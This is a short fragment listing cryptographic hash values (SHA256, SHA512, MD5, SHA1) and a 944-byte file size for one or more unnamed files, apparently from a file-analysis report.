SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29